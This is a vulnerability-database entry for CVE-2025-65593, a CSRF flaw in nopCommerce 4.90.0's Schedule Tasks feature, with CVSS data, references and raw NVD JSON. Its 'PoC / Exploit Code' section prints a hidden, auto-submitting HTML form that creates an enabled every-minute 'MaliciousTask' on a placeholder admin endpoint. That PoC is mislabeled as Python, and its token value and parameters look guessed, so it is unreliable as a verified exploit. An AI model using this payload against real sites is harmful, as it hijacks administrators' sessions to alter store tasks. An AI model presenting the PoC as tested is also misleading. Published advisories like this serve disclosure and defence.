Security Vulnerability Report
中文
CVE-2025-65593 CVSS 8.8 HIGH

CVE-2025-65593

Published: 2025-12-16 19:15:59
Last Modified: 2025-12-19 16:38:29

Description

nopCommerce 4.90.0 is vulnerable to Cross Site Request Forgery (CSRF) via the Schedule Tasks functionality.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nopcommerce:nopcommerce:4.90.0:*:*:*:*:*:*:* - VULNERABLE
nopCommerce 4.90.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for nopCommerce 4.90.0 Schedule Tasks --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC</title> </head> <body> <h1>Scheduled Task CSRF PoC</h1> <p>This PoC demonstrates the CSRF vulnerability in nopCommerce Schedule Tasks.</p> <!-- Auto-submit form targeting Schedule Tasks endpoint --> <form id="csrfForm" action="https://target-site.com/Admin/ScheduleTask" method="POST" style="display:none;"> <!-- Anti-forgery token (if not validated properly) --> <input type="hidden" name="__RequestVerificationToken" value="attacker-controlled-or-empty" /> <!-- Malicious task parameters --> <input type="hidden" name="Name" value="MaliciousTask" /> <input type="hidden" name="CronExpression" value="* * * * *" /> <input type="hidden" name="Enabled" value="true" /> <input type="hidden" name="SelectedTaskType" value="SystemTaskType" /> </form> <script> // Auto-submit the form when page loads document.addEventListener('DOMContentLoaded', function() { document.getElementById('csrfForm').submit(); }); </script> <p>If you see this message, the form has been submitted.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65593", "sourceIdentifier": "[email protected]", "published": "2025-12-16T19:15:59.080", "lastModified": "2025-12-19T16:38:29.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "nopCommerce 4.90.0 is vulnerable to Cross Site Request Forgery (CSRF) via the Schedule Tasks functionality."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nopcommerce:nopcommerce:4.90.0:*:*:*:*:*:*:*", "matchCriteriaId": "1FC64557-EDFD-4460-8793-8C452638D782"}]}]}], "references": [{"url": "https://seclists.org/fulldisclosure/2025/Dec/20", "source": "[email protected]", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "https://www.nopcommerce.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "http://seclists.org/fulldisclosure/2025/Dec/20", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}